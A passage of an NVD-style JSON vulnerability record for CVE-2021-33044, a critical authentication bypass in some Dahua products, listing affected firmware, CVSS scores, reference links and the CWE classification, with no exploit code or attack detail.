                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ADA22FE4-6663-4852-9D82-F311520BB4D6",
                     versionEndExcluding: "2.630.0000000.8.r.210630",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "4A693D2B-F82D-41C8-A219-532CB5FD1FB6",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.",
      },
      {
         lang: "es",
         value: "Una vulnerabilidad de omisión de autenticación de identidad encontrada en algunos productos Dahua durante el proceso de inicio de sesión. Los atacantes pueden omitir la autenticación de la identidad del dispositivo al construir paquetes de datos maliciosos",
      },
   ],
   id: "CVE-2021-33044",
   lastModified: "2024-11-21T06:08:10.943",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 10,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2021-09-15T22:15:10.497",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Exploit",
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
      },
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Exploit",
            "Mailing List",
            "Third Party Advisory",
         ],
         url: "http://seclists.org/fulldisclosure/2021/Oct/13",
      },
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Exploit",
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Exploit",
            "Mailing List",
            "Third Party Advisory",
         ],
         url: "http://seclists.org/fulldisclosure/2021/Oct/13",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-287",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}